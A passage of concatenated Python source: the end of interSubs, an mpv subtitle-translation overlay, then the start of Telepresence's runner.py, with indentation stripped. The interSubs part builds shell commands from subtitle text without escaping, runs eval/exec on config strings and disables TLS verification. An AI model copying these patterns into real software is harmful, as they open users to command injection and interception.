'hy' : 'Armenian',
'bn' : 'Bengali',
'ca' : 'Catalan',
'zh' : 'Chinese',
'zh-cn' : 'Chinese (Mandarin/China)',
'zh-tw' : 'Chinese (Mandarin/Taiwan)',
'zh-yue' : 'Chinese (Cantonese)',
'hr' : 'Croatian',
'cs' : 'Czech',
'da' : 'Danish',
'nl' : 'Dutch',
'en' : 'English',
'en-au' : 'English (Australia)',
'en-uk' : 'English (United Kingdom)',
'en-us' : 'English (United States)',
'eo' : 'Esperanto',
'fi' : 'Finnish',
'fr' : 'French',
'de' : 'German',
'el' : 'Greek',
'hi' : 'Hindi',
'hu' : 'Hungarian',
'is' : 'Icelandic',
'id' : 'Indonesian',
'it' : 'Italian',
'iw' : 'Hebrew',
'ja' : 'Japanese',
'km' : 'Khmer (Cambodian)',
'ko' : 'Korean',
'la' : 'Latin',
'lv' : 'Latvian',
'mk' : 'Macedonian',
'no' : 'Norwegian',
'pl' : 'Polish',
'pt' : 'Portuguese',
'ro' : 'Romanian',
'ru' : 'Russian',
'sr' : 'Serbian',
'si' : 'Sinhala',
'sk' : 'Slovak',
'es' : 'Spanish',
'es-es' : 'Spanish (Spain)',
'es-us' : 'Spanish (United States)',
'sw' : 'Swahili',
'sv' : 'Swedish',
'ta' : 'Tamil',
'th' : 'Thai',
'tr' : 'Turkish',
'uk' : 'Ukrainian',
'vi' : 'Vietnamese',
'cy' : 'Welsh'
}
def __init__(self, text, lang = 'en', slow = False, debug = False):
self.debug = debug
if lang.lower() not in self.LANGUAGES:
raise Exception('Language not supported: %s' % lang)
else:
self.lang = lang.lower()
if not text:
raise Exception('No text to speak')
else:
self.text = text
# Read speed
if slow:
self.speed = self.Speed().SLOW
else:
self.speed = self.Speed().NORMAL
# Split text in parts
if self._len(text) <= self.MAX_CHARS:
text_parts = [text]
else:
text_parts = self._tokenize(text, self.MAX_CHARS)
# Clean
def strip(x): return x.replace('\n', '').strip()
text_parts = [strip(x) for x in text_parts]
text_parts = [x for x in text_parts if len(x) > 0]
self.text_parts = text_parts
# Google Translate token
self.token = Token()
def save(self, savefile):
""" Do the Web request and save to `savefile` """
with open(savefile, 'wb') as f:
self.write_to_fp(f)
def write_to_fp(self, fp):
""" Do the Web request and save to a file-like object """
for idx, part in enumerate(self.text_parts):
payload = { 'ie' : 'UTF-8',
'q' : part,
'tl' : self.lang,
'ttsspeed' : self.speed,
'total' : len(self.text_parts),
'idx' : idx,
'client' : 'tw-ob',
'textlen' : self._len(part),
'tk' : self.token.calculate_token(part)}
headers = {
"Referer" : "http://translate.google.com/",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36"
}
if self.debug: print(payload)
try:
# Disable requests' ssl verify to accomodate certain proxies and firewalls
# Filter out urllib3's insecure warnings. We can live without ssl verify here
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=requests.packages.urllib3.exceptions.InsecureRequestWarning)
r = requests.get(self.GOOGLE_TTS_URL,
params=payload,
headers=headers,
proxies=urllib.request.getproxies(),
verify=False)
if self.debug:
print("Headers: {}".format(r.request.headers))
print("Request url: {}".format(r.request.url))
print("Response: {}, Redirects: {}".format(r.status_code, r.history))
r.raise_for_status()
for chunk in r.iter_content(chunk_size=1024):
fp.write(chunk)
except Exception as e:
raise
def _len(self, text):
""" Get char len of `text`, after decoding if Python 2 """
try:
# Python 2
return len(text.decode('utf8'))
except AttributeError:
# Python 3
return len(text)
def _tokenize(self, text, max_size):
""" Tokenizer on basic roman punctuation """
punc = "¡!()[]¿?.,;:—«»\n"
punc_list = [re.escape(c) for c in punc]
pattern = '|'.join(punc_list)
parts = re.split(pattern, text)
min_parts = []
for p in parts:
min_parts += self._minimize(p, " ", max_size)
return min_parts
def _minimize(self, thestring, delim, max_size):
""" Recursive function that splits `thestring` in chunks
of maximum `max_size` chars delimited by `delim`. Returns list. """
if self._len(thestring) > max_size:
idx = thestring.rfind(delim, 0, max_size)
return [thestring[:idx]] + self._minimize(thestring[idx:], delim, max_size)
else:
return [thestring]
def mpv_pause():
os.system('echo \'{ "command": ["set_property", "pause", true] }\' | socat - "' + mpv_socket + '" > /dev/null')
def mpv_resume():
os.system('echo \'{ "command": ["set_property", "pause", false] }\' | socat - "' + mpv_socket + '" > /dev/null')
def mpv_pause_status():
stdoutdata = subprocess.getoutput('echo \'{ "command": ["get_property", "pause"] }\' | socat - "' + mpv_socket + '"')
try:
return loads(stdoutdata)['data']
except:
return mpv_pause_status()
def mpv_fullscreen_status():
stdoutdata = subprocess.getoutput('echo \'{ "command": ["get_property", "fullscreen"] }\' | socat - "' + mpv_socket + '"')
try:
return loads(stdoutdata)['data']
except:
return mpv_fullscreen_status()
def mpv_message(message, timeout = 3000):
os.system('echo \'{ "command": ["show-text", "' + message + '", "' + str(timeout) + '"] }\' | socat - "' + mpv_socket + '" > /dev/null')
def stripsd2(phrase):
return ''.join(e for e in phrase.strip().lower() if e == ' ' or (e.isalnum() and not e.isdigit())).strip()
def r2l(l):
l2 = ''
try:
l2 = re.findall('(?!%)\W+$', l)[0][::-1]
except:
pass
l2 += re.sub('^\W+|(?!%)\W+$', '', l)
try:
l2 += re.findall('^\W+', l)[0][::-1]
except:
pass
return l2
def split_long_lines(line, chunks = 2, max_symbols_per_line = False):
if max_symbols_per_line:
chunks = 0
while 1:
chunks += 1
new_lines = []
for i in range(chunks):
new_line = ' '.join(numpy.array_split(line.split(' '), chunks)[i])
new_lines.append(new_line)
if len(max(new_lines, key = len)) <= max_symbols_per_line:
return '\n'.join(new_lines)
else:
new_lines = []
for i in range(chunks):
new_line = ' '.join(numpy.array_split(line.split(' '), chunks)[i])
new_lines.append(new_line)
return '\n'.join(new_lines)
def dir2(name):
print('\n'.join(dir( name )))
exit()
class thread_subtitles(QObject):
update_subtitles = pyqtSignal(bool, bool)
@pyqtSlot()
def main(self):
global subs
was_hidden = 0
inc = 0
auto_pause_2_ind = 0
last_updated = time.time()
while 1:
time.sleep(config.update_time)
# hide subs when mpv isn't in focus or in fullscreen
if inc * config.update_time > config.focus_checking_time - 0.0001:
while 'mpv' not in subprocess.getoutput('xdotool getwindowfocus getwindowname') or (config.hide_when_not_fullscreen_B and not mpv_fullscreen_status()) or (os.path.exists(mpv_socket + '_hide')):
if not was_hidden:
self.update_subtitles.emit(True, False)
was_hidden = 1
else:
time.sleep(config.focus_checking_time)
inc = 0
inc += 1
if was_hidden:
was_hidden = 0
self.update_subtitles.emit(False, False)
continue
try:
tmp_file_subs = open(sub_file).read()
except:
continue
# tmp hack
# if config.R2L_from_B:
# tmp_file_subs = r2l(tmp_file_subs.strip())
if config.extend_subs_duration2max_B and not len(tmp_file_subs):
if not config.extend_subs_duration_limit_sec:
continue
if config.extend_subs_duration_limit_sec > time.time() - last_updated:
continue
last_updated = time.time()
# automatically switch into Hebrew if it's detected
if config.lang_from != 'he' and config.lang_from != 'iw' and any((c in set('קראטוןםפשדגכעיחלךףזסבהנמצתץ')) for c in tmp_file_subs):
config.lang_from = 'he'
frf = random.choice(config.he_fonts)
config.style_subs = re.sub('font-family: ".*?";', lambda ff: 'font-family: "%s";' % frf, config.style_subs, flags = re.I)
config.R2L_from_B = True
config.translation_function_names = config.translation_function_names_2
config.listen_via = 'forvo'
os.system('notify-send -i none -t 1111 "He"')
os.system('notify-send -i none -t 1111 "%s"' % str(frf))
self.update_subtitles.emit(False, True)
while tmp_file_subs != subs:
if config.auto_pause == 2:
if not auto_pause_2_ind and len(re.sub(' +', ' ', stripsd2(subs.replace('\n', ' '))).split(' ')) > config.auto_pause_min_words - 1 and not mpv_pause_status():
mpv_pause()
auto_pause_2_ind = 1
if auto_pause_2_ind and mpv_pause_status():
break
auto_pause_2_ind = 0
subs = tmp_file_subs
if config.auto_pause == 1:
if len(re.sub(' +', ' ', stripsd2(subs.replace('\n', ' '))).split(' ')) > config.auto_pause_min_words - 1:
mpv_pause()
self.update_subtitles.emit(False, False)
break
class thread_translations(QObject):
get_translations = pyqtSignal(str, int, bool)
@pyqtSlot()
def main(self):
while 1:
to_new_word = False
try:
word, globalX = config.queue_to_translate.get(False)
except:
time.sleep(config.update_time)
continue
# changing cursor to hourglass during translation
QApplication.setOverrideCursor(Qt.WaitCursor)
threads = []
for translation_function_name in config.translation_function_names:
threads.append(threading.Thread(target = globals()[translation_function_name], args = (word,)))
for x in threads:
x.start()
while any(thread.is_alive() for thread in threads):
if config.queue_to_translate.qsize():
to_new_word = True
break
time.sleep(config.update_time)
QApplication.restoreOverrideCursor()
if to_new_word:
continue
if config.block_popup:
continue
self.get_translations.emit(word, globalX, False)
# drawing layer
# because can't calculate outline with precision
class drawing_layer(QLabel):
def __init__(self, line, subs, parent=None):
super().__init__(None)
self.line = line
self.setStyleSheet(config.style_subs)
self.psuedo_line = 0
def draw_text_n_outline(self, painter: QPainter, x, y, outline_width, outline_blur, text):
outline_color = QColor(config.outline_color)
font = self.font()
text_path = QPainterPath()
if config.R2L_from_B:
text_path.addText(x, y, font, ' ' + r2l(text.strip()) + ' ')
else:
text_path.addText(x, y, font, text)
# draw blur
range_width = range(outline_width, outline_width + outline_blur)
# ~range_width = range(outline_width + outline_blur, outline_width, -1)
for width in range_width:
if width == min(range_width):
alpha = 200
else:
alpha = (max(range_width) - width) / max(range_width) * 200
alpha = int(alpha)
blur_color = QColor(outline_color.red(), outline_color.green(), outline_color.blue(), alpha)
blur_brush = QBrush(blur_color, Qt.SolidPattern)
blur_pen = QPen(blur_brush, width, Qt.SolidLine, Qt.RoundCap, Qt.RoundJoin)
painter.setPen(blur_pen)
painter.drawPath(text_path)
# draw outline
outline_color = QColor(outline_color.red(), outline_color.green(), outline_color.blue(), 255)
outline_brush = QBrush(outline_color, Qt.SolidPattern)
outline_pen = QPen(outline_brush, outline_width, Qt.SolidLine, Qt.RoundCap, Qt.RoundJoin)
painter.setPen(outline_pen)
painter.drawPath(text_path)
# draw text
color = self.palette().color(QPalette.Text)
painter.setPen(color)
painter.drawText(x, y, text)
if config.outline_B:
def paintEvent(self, evt: QPaintEvent):
if not self.psuedo_line:
self.psuedo_line = 1
return
x = y = 0
y += self.fontMetrics().ascent()
painter = QPainter(self)
self.draw_text_n_outline(
painter,
x,
y + config.outline_top_padding - config.outline_bottom_padding,
config.outline_thickness,
config.outline_blur,
text = self.line
)
def resizeEvent(self, *args):
self.setFixedSize(
self.fontMetrics().width(self.line),
self.fontMetrics().height() +
config.outline_bottom_padding +
config.outline_top_padding
)
def sizeHint(self):
return QSize(
self.fontMetrics().width(self.line),
self.fontMetrics().height()
)
class events_class(QLabel):
mouseHover = pyqtSignal(str, int, bool)
redraw = pyqtSignal(bool, bool)
def __init__(self, word, subs, skip = False, parent=None):
super().__init__(word)
self.setMouseTracking(True)
self.word = word
self.subs = subs
self.skip = skip
self.highlight = False
self.setStyleSheet('background: transparent; color: transparent;')
def highligting(self, color, underline_width):
color = QColor(color)
color = QColor(color.red(), color.green(), color.blue(), 200)
painter = QPainter(self)
if config.hover_underline:
font_metrics = QFontMetrics(self.font())
text_width = font_metrics.width(self.word)
text_height = font_metrics.height()
brush = QBrush(color)
pen = QPen(brush, underline_width, Qt.SolidLine, Qt.RoundCap)
painter.setPen(pen)
if not self.skip:
painter.drawLine(0, text_height - underline_width, text_width, text_height - underline_width)
if config.hover_hightlight:
x = y = 0
y += self.fontMetrics().ascent()
painter.setPen(color)
painter.drawText(x, y + config.outline_top_padding - config.outline_bottom_padding, self.word)
if config.outline_B:
def paintEvent(self, evt: QPaintEvent):
if self.highlight:
self.highligting(config.hover_color, config.hover_underline_thickness)
#####################################################
def resizeEvent(self, event):
text_height = self.fontMetrics().height()
text_width = self.fontMetrics().width(self.word)
self.setFixedSize(text_width, text_height + config.outline_bottom_padding + config.outline_top_padding)
def enterEvent(self, event):
if not self.skip:
self.highlight = True
self.repaint()
config.queue_to_translate.put((self.word, event.globalX()))
@pyqtSlot()
def leaveEvent(self, event):
if not self.skip:
self.highlight = False
self.repaint()
config.scroll = {}
self.mouseHover.emit('', 0, False)
QApplication.restoreOverrideCursor()
def wheel_scrolling(self, event):
if event.y() > 0:
return 'ScrollUp'
if event.y():
return 'ScrollDown'
if event.x() > 0:
return 'ScrollLeft'
if event.x():
return 'ScrollRight'
def wheelEvent(self, event):
for mouse_action in config.mouse_buttons:
if self.wheel_scrolling(event.angleDelta()) == mouse_action[0]:
if event.modifiers() == eval('Qt.%s' % mouse_action[1]):
exec('self.%s(event)' % mouse_action[2])
def mousePressEvent(self, event):
for mouse_action in config.mouse_buttons:
if 'Scroll' not in mouse_action[0]:
if event.button() == eval('Qt.%s' % mouse_action[0]):
if event.modifiers() == eval('Qt.%s' % mouse_action[1]):
exec('self.%s(event)' % mouse_action[2])
#####################################################
def f_show_in_browser(self, event):
config.avoid_resuming = True
os.system(config.show_in_browser.replace('${word}', self.word))
def f_auto_pause_options(self, event):
if config.auto_pause == 2:
config.auto_pause = 0
else:
config.auto_pause += 1
mpv_message('auto_pause: %d' % config.auto_pause)
def f_listen(self, event):
listen(self.word, config.listen_via)
@pyqtSlot()
def f_subs_screen_edge_padding_decrease(self, event):
config.subs_screen_edge_padding -= 5
mpv_message('subs_screen_edge_padding: %d' % config.subs_screen_edge_padding)
self.redraw.emit(False, True)
@pyqtSlot()
def f_subs_screen_edge_padding_increase(self, event):
config.subs_screen_edge_padding += 5
mpv_message('subs_screen_edge_padding: %d' % config.subs_screen_edge_padding)
self.redraw.emit(False, True)
@pyqtSlot()
def f_font_size_decrease(self, event):
config.style_subs = re.sub('font-size: (\d+)px;', lambda size: [ 'font-size: %dpx;' % ( int(size.group(1)) - 1 ), mpv_message('font: %s' % size.group(1)) ][0], config.style_subs, flags = re.I)
self.redraw.emit(False, True)
@pyqtSlot()
def f_font_size_increase(self, event):
config.style_subs = re.sub('font-size: (\d+)px;', lambda size: [ 'font-size: %dpx;' % ( int(size.group(1)) + 1 ), mpv_message('font: %s' % size.group(1)) ][0], config.style_subs, flags = re.I)
self.redraw.emit(False, True)
def f_auto_pause_min_words_decrease(self, event):
config.auto_pause_min_words -= 1
mpv_message('auto_pause_min_words: %d' % config.auto_pause_min_words)
def f_auto_pause_min_words_increase(self, event):
config.auto_pause_min_words += 1
mpv_message('auto_pause_min_words: %d' % config.auto_pause_min_words)
# f_deepl_translation -> f_translation_full_sentence
@pyqtSlot()
def f_deepl_translation(self, event):
self.mouseHover.emit(self.subs , event.globalX(), True)
@pyqtSlot()
def f_translation_full_sentence(self, event):
self.mouseHover.emit(self.subs , event.globalX(), True)
def f_save_word_to_file(self, event):
if ( os.path.isfile(os.path.expanduser(config.save_word_to_file_fname)) and self.word not in [ x.strip() for x in open(os.path.expanduser(config.save_word_to_file_fname)).readlines() ] ) or not os.path.isfile(os.path.expanduser(config.save_word_to_file_fname)):
print(self.word, file = open(os.path.expanduser(config.save_word_to_file_fname), 'a'))
@pyqtSlot()
def f_scroll_translations_up(self, event):
if self.word in config.scroll and config.scroll[self.word] > 0:
config.scroll[self.word] = config.scroll[self.word] - 1
else:
config.scroll[self.word] = 0
self.mouseHover.emit(self.word, event.globalX(), False)
@pyqtSlot()
def f_scroll_translations_down(self, event):
if self.word in config.scroll:
config.scroll[self.word] = config.scroll[self.word] + 1
else:
config.scroll[self.word] = 1
self.mouseHover.emit(self.word, event.globalX(), False)
class main_class(QWidget):
def __init__(self):
super().__init__()
self.thread_subs = QThread()
self.obj = thread_subtitles()
self.obj.update_subtitles.connect(self.render_subtitles)
self.obj.moveToThread(self.thread_subs)
self.thread_subs.started.connect(self.obj.main)
self.thread_subs.start()
self.thread_translations = QThread()
self.obj2 = thread_translations()
self.obj2.get_translations.connect(self.render_popup)
self.obj2.moveToThread(self.thread_translations)
self.thread_translations.started.connect(self.obj2.main)
self.thread_translations.start()
# start the forms
self.subtitles_base()
self.subtitles_base2()
self.popup_base()
def clearLayout(self, layout):
if layout == 'subs':
layout = self.subtitles_vbox
self.subtitles.hide()
elif layout == 'subs2':
layout = self.subtitles_vbox2
self.subtitles2.hide()
elif layout == 'popup':
layout = self.popup_vbox
self.popup.hide()
if layout is not None:
while layout.count():
item = layout.takeAt(0)
widget = item.widget()
if widget is not None:
widget.deleteLater()
else:
self.clearLayout(item.layout())
def subtitles_base(self):
self.subtitles = QFrame()
self.subtitles.setAttribute(Qt.WA_TranslucentBackground)
self.subtitles.setWindowFlags(Qt.X11BypassWindowManagerHint)
self.subtitles.setStyleSheet(config.style_subs)
self.subtitles_vbox = QVBoxLayout(self.subtitles)
self.subtitles_vbox.setSpacing(config.subs_padding_between_lines)
self.subtitles_vbox.setContentsMargins(0, 0, 0, 0)
def subtitles_base2(self):
self.subtitles2 = QFrame()
self.subtitles2.setAttribute(Qt.WA_TranslucentBackground)
self.subtitles2.setWindowFlags(Qt.X11BypassWindowManagerHint)
self.subtitles2.setStyleSheet(config.style_subs)
self.subtitles_vbox2 = QVBoxLayout(self.subtitles2)
self.subtitles_vbox2.setSpacing(config.subs_padding_between_lines)
self.subtitles_vbox2.setContentsMargins(0, 0, 0, 0)
if config.pause_during_translation_B:
self.subtitles2.enterEvent = lambda event : [mpv_pause(), setattr(config, 'block_popup', False)][0]
self.subtitles2.leaveEvent = lambda event : [mpv_resume(), setattr(config, 'block_popup', True)][0] if not config.avoid_resuming else [setattr(config, 'avoid_resuming', False), setattr(config, 'block_popup', True)][0]
def popup_base(self):
self.popup = QFrame()
self.popup.setAttribute(Qt.WA_TranslucentBackground)
self.popup.setWindowFlags(Qt.X11BypassWindowManagerHint)
self.popup.setStyleSheet(config.style_popup)
self.popup_inner = QFrame()
outer_box = QVBoxLayout(self.popup)
outer_box.addWidget(self.popup_inner)
self.popup_vbox = QVBoxLayout(self.popup_inner)
self.popup_vbox.setSpacing(0)
def render_subtitles(self, hide = False, redraw = False):
if hide or not len(subs):
try:
self.subtitles.hide()
self.subtitles2.hide()
finally:
return
if redraw:
self.subtitles.setStyleSheet(config.style_subs)
self.subtitles2.setStyleSheet(config.style_subs)
else:
self.clearLayout('subs')
self.clearLayout('subs2')
if hasattr(self, 'popup'):
self.popup.hide()
# if subtitle consists of one overly long line - split into two
if config.split_long_lines_B and len(subs.split('\n')) == 1 and len(subs.split(' ')) > config.split_long_lines_words_min - 1:
subs2 = split_long_lines(subs)
else:
subs2 = subs
subs2 = re.sub(' +', ' ', subs2).strip()
##############################
for line in subs2.split('\n'):
line2 = ' %s ' % line.strip()
ll = drawing_layer(line2, subs2)
hbox = QHBoxLayout()
hbox.setContentsMargins(0, 0, 0, 0)
hbox.setSpacing(0)
hbox.addStretch()
hbox.addWidget(ll)
hbox.addStretch()
self.subtitles_vbox.addLayout(hbox)
####################################
hbox = QHBoxLayout()
hbox.setContentsMargins(0, 0, 0, 0)
hbox.setSpacing(0)
hbox.addStretch()
if config.R2L_from_B:
line2 = line2[::-1]
line2 += '\00'
word = ''
for smbl in line2:
if smbl.isalpha():
word += smbl
else:
if len(word):
if config.R2L_from_B:
word = word[::-1]
ll = events_class(word, subs2)
ll.mouseHover.connect(self.render_popup)
ll.redraw.connect(self.render_subtitles)
hbox.addWidget(ll)
word = ''
if smbl != '\00':
ll = events_class(smbl, subs2, skip = True)
hbox.addWidget(ll)
hbox.addStretch()
self.subtitles_vbox2.addLayout(hbox)
self.subtitles.adjustSize()
self.subtitles2.adjustSize()
w = self.subtitles.geometry().width()
h = self.subtitles.height = self.subtitles.geometry().height()
x = (config.screen_width/2) - (w/2)
if config.subs_top_placement_B:
y = config.subs_screen_edge_padding
else:
y = config.screen_height - config.subs_screen_edge_padding - h
self.subtitles.setGeometry(int(x), int(y), 0, 0)
self.subtitles.show()
self.subtitles2.setGeometry(int(x), int(y), 0, 0)
self.subtitles2.show()
def render_popup(self, text, x_cursor_pos, is_line):
if text == '':
if hasattr(self, 'popup'):
self.popup.hide()
return
self.clearLayout('popup')
if is_line:
QApplication.setOverrideCursor(Qt.WaitCursor)
line = globals()[config.translation_function_name_full_sentence](text)
if config.translation_function_name_full_sentence == 'google':
try:
line = line[0][0][0].strip()
except:
line = 'Google translation failed.'
if config.split_long_lines_B and len(line.split('\n')) == 1 and len(line.split(' ')) > config.split_long_lines_words_min - 1:
line = split_long_lines(line)
ll = QLabel(line)
ll.setObjectName("first_line")
self.popup_vbox.addWidget(ll)
else:
word = text
for translation_function_name_i, translation_function_name in enumerate(config.translation_function_names):
pairs, word_descr = globals()[translation_function_name](word)
if not len(pairs):
pairs = [['', '[Not found]']]
#return
# ~pairs = [ [ str(i) + ' ' + pair[0], pair[1] ] for i, pair in enumerate(pairs) ]
if word in config.scroll:
if len(pairs[config.scroll[word]:]) > config.number_of_translations:
pairs = pairs[config.scroll[word]:]
else:
pairs = pairs[-config.number_of_translations:]
if len(config.translation_function_names) == 1:
config.scroll[word] -= 1
for i1, pair in enumerate(pairs):
if i1 == config.number_of_translations:
break
if config.split_long_lines_in_popup_B:
pair[0] = split_long_lines(pair[0], max_symbols_per_line = config.split_long_lines_in_popup_symbols_min)
pair[1] = split_long_lines(pair[1], max_symbols_per_line = config.split_long_lines_in_popup_symbols_min)
if pair[0] == '-':
pair[0] = ''
if pair[1] == '-':
pair[1] = ''
# ~if config.R2L_from_B:
# ~pair[0] = pair[0][::-1]
# ~if config.R2L_to_B:
# ~pair[1] = pair[1][::-1]
if pair[0] != '':
# to emphasize the exact form of the word
# to ignore case on input and match it on output
chnks = re.split(word, pair[0], flags = re.I)
exct_words = re.findall(word, pair[0], flags = re.I)
hbox = QHBoxLayout()
hbox.setContentsMargins(0, 0, 0, 0)
for i2, chnk in enumerate(chnks):
if len(chnk):
ll = QLabel(chnk)
ll.setObjectName("first_line")
hbox.addWidget(ll)
if i2 + 1 < len(chnks):
ll = QLabel(exct_words[i2])
ll.setObjectName("first_line_emphasize_word")
hbox.addWidget(ll)
# filling the rest of the line with empty bg
ll = QLabel()
ll.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Preferred)
hbox.addWidget(ll)
self.popup_vbox.addLayout(hbox)
if pair[1] != '':
ll = QLabel(pair[1])
ll.setObjectName("second_line")
self.popup_vbox.addWidget(ll)
# padding
ll = QLabel()
ll.setStyleSheet("font-size: 6px;")
self.popup_vbox.addWidget(ll)
if len(word_descr[0]):
ll = QLabel(word_descr[0])
ll.setProperty("morphology", word_descr[1])
ll.setAlignment(Qt.AlignRight)
self.popup_vbox.addWidget(ll)
# delimiter between dictionaries
if translation_function_name_i + 1 < len(config.translation_function_names):
ll = QLabel()
ll.setObjectName("delimiter")
self.popup_vbox.addWidget(ll)
self.popup_inner.adjustSize()
self.popup.adjustSize()
w = self.popup.geometry().width()
h = self.popup.geometry().height()
if w > config.screen_width:
w = config.screen_width - 20
if not is_line:
if w < config.screen_width / 3:
w = config.screen_width / 3
if x_cursor_pos == -1:
x = (config.screen_width/2) - (w/2)
else:
x = x_cursor_pos - w/5
if x+w > config.screen_width:
x = config.screen_width - w
if config.subs_top_placement_B:
y = self.subtitles.height + config.subs_screen_edge_padding
else:
y = config.screen_height - config.subs_screen_edge_padding - self.subtitles.height - h
self.popup.setGeometry(int(x), int(y), int(w), 0)
self.popup.show()
QApplication.restoreOverrideCursor()
if __name__ == "__main__":
print('[py part] Starting interSubs ...')
try:
os.mkdir('urls')
except:
pass
if 'tab_divided_dict' in config.translation_function_names:
offdict = { x.split('\t')[0].strip().lower() : x.split('\t')[1].strip() for x in open(os.path.expanduser(config.tab_divided_dict_fname)).readlines() if '\t' in x }
mpv_socket = sys.argv[1]
sub_file = sys.argv[2]
# sub_file = '/tmp/mpv_sub_'
# mpv_socket = '/tmp/mpv_socket_'
subs = ''
app = QApplication(sys.argv)
config.avoid_resuming = False
config.block_popup = False
config.scroll = {}
config.queue_to_translate = queue.Queue()
config.screen_width = app.primaryScreen().size().width()
config.screen_height = app.primaryScreen().size().height()
form = main_class()
app.exec_()
|
runner.py
|
# Copyright 2018 Datawire. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import platform
import select
import signal
import socket
import sys
import textwrap
import typing
import uuid
from contextlib import contextmanager
from functools import partial
from inspect import currentframe, getframeinfo
from pathlib import Path
from shutil import rmtree, which
from subprocess import STDOUT, CalledProcessError, Popen, TimeoutExpired
from tempfile import mkdtemp
from threading import Thread
from time import sleep, time
from telepresence import TELEPRESENCE_BINARY
from telepresence.utilities import kill_process, str_command
from .cache import Cache
from .kube import KUBE_UNSET
from .launch import BackgroundProcessCrash, _launch_command, _Logger
from .output import Output
from .output_mask import mask_sensitive_data
from .span import Span
_CleanupItem = typing.NamedTuple(
"_CleanupItem", [
("name", str),
("callable", typing.Callable[..., None]),
("args", typing.Tuple[typing.Any, ...]),
("kwargs", typing.Dict[str, typing.Any]),
]
)
class Runner:
"""Context for running subprocesses."""
def __init__(self, logfile_path: str, verbose: bool) -> None:
"""
:param logfile_path: Path or string file path or "-" for stdout
:param kubeinfo: How to run kubectl or equivalent
:param verbose: Whether subcommand should run in verbose mode.
"""
self.output = Output(logfile_path)
self.logfile_path = self.output.logfile_path
self.kubectl = KUBE_UNSET
self.verbose = verbose
self.start_time = time()
self.current_span = None # type: typing.Optional[Span]
self.counter = 0
self.cleanup_stack = [] # type: typing.List[_CleanupItem]
self.sudo_held = False
self.sudo_for_docker = False
self.quitting = False
self.ended = [] # type: typing.List[str]
self.is_wsl = False
if sys.platform.startswith("linux"):
self.platform = "linux"
# Detect if this platform is really linux-on-windows
if platform.uname().release.endswith("-Microsoft"):
self.is_wsl = True
elif sys.platform.startswith("darwin"):
self.platform = "darwin"
else:
# For untested platforms...
self.platform = sys.platform
self.output.write("uname: {}".format(platform.uname()))
self.output.write("Platform: {}".format(self.platform))
self.output.write("WSL: {}".format(self.is_wsl))
term_width = 99999
self.chatty = False
if sys.stderr.isatty():
err_fd = sys.stderr.fileno()
try:
term_width = os.get_terminal_size(err_fd).columns - 1
self.chatty = True
except OSError:
pass
if term_width < 25:
term_width = 99999
self.wrapper = textwrap.TextWrapper(
width=term_width,
initial_indent="T: ",
subsequent_indent="T: ",
replace_whitespace=False,
drop_whitespace=False,
)
self.raw_wrapper = textwrap.TextWrapper(
width=99999,
initial_indent="T: ",
subsequent_indent="T: ",
replace_whitespace=False,
drop_whitespace=False,
)
self.session_id = uuid.uuid4().hex
# Log some version info
self.output.write("Python {}".format(sys.version))
cache_dir = os.path.expanduser("~/.cache/telepresence")
os.makedirs(cache_dir, exist_ok=True)
cache_filename = os.path.join(cache_dir, "cache.json")
self.cache = Cache.load(cache_filename)
self.cache.invalidate(12 * 60 * 60)
self.add_cleanup("Save caches", self.cache.save, cache_filename)
# Docker for Mac doesn't share TMPDIR, so make sure we use /tmp
# Docker for Windows can't access /tmp, so use a directory it can
tmp_dir = "/tmp"
if self.is_wsl:
tmp_dir = "/c/temp"
if not os.path.exists(tmp_dir):
os.makedirs(tmp_dir)
self.temp = Path(mkdtemp(prefix="tel-", dir=tmp_dir))
(self.temp / "session_id.txt").write_text(self.session_id)
self.add_cleanup("Remove temporary directory", rmtree, str(self.temp))
# Adjust PATH to cover common locations for conntrack, ifconfig, etc.
# Also maybe prepend Telepresence's libexec directory.
path = os.environ.get("PATH", os.defpath)
path_elements = path.split(os.pathsep)
for additional in "/usr/sbin", "/sbin":
if additional not in path_elements:
path += ":" + additional
try:
libexec = TELEPRESENCE_BINARY.parents[1] / "libexec"
except IndexError:
libexec = TELEPRESENCE_BINARY / "does_not_exist_please"
if libexec.exists():
path = "{}:{}".format(libexec, path)
os.environ["PATH"] = path
def span(
self, name: str = "", context: bool = True, verbose: bool = True
) -> Span:
"""Write caller's frame info to the log."""
if context:
frame = currentframe()
assert frame is not None # mypy
info = getframeinfo(frame.f_back)
tag = "{}:{}({})".format(
os.path.basename(info.filename), info.lineno,
"{},{}".format(info.function, name) if name else info.function
)
else:
tag = name
s = Span(self, tag, self.current_span, verbose=verbose)
self.current_span = s
s.begin()
return s
def write(self, message: str, prefix: str = "TEL") -> None:
"""Don't use this..."""
return self.output.write(message, prefix)
def read_logs(self) -> str:
"""Return the end of the contents of the log"""
sleep(2.0)
return self.output.read_logs()
def show(self, message: str) -> None:
"""Display a message to the user on stderr"""
self.write(message, prefix=">>>")
for line in message.splitlines():
print(self.wrapper.fill(line), file=sys.stderr)
def show_raw(self, message: str) -> None:
"""Display a message to the user on stderr (no reformatting)"""
self.write(message, prefix=">>>")
for line in message.splitlines():
print(self.raw_wrapper.fill(line), file=sys.stderr)
def make_temp(self, name: str) -> Path:
res = self.temp / name
res.mkdir()
return res
# Privilege escalation (sudo)
def _hold_sudo(self) -> None:
counter = 0
while self.sudo_held:
# Sleep between calls to sudo
if counter < 30:
sleep(1)
counter += 1
else:
try:
self.check_call(["sudo", "-n", "echo", "-n"])
counter = 0
except CalledProcessError:
self.sudo_held = False
self.write("Attempt to hold on to sudo privileges failed")
self.write("(sudo privileges holder thread exiting)")
def _drop_sudo(self) -> None:
self.sudo_held = False
def require_sudo(self) -> None:
"""
Grab sudo and hold on to it. Show a clear prompt to the user.
"""
if self.sudo_held:
return
self.require(["sudo"], "Some operations require elevated privileges")
try:
# See whether we can grab privileges without a password
self.check_call(["sudo", "-n", "echo", "-n"])
except CalledProcessError:
# Apparently not. Prompt clearly then sudo again.
self.show(
"How Telepresence uses sudo: " +
"https://www.telepresence.io/reference/install#dependencies"
)
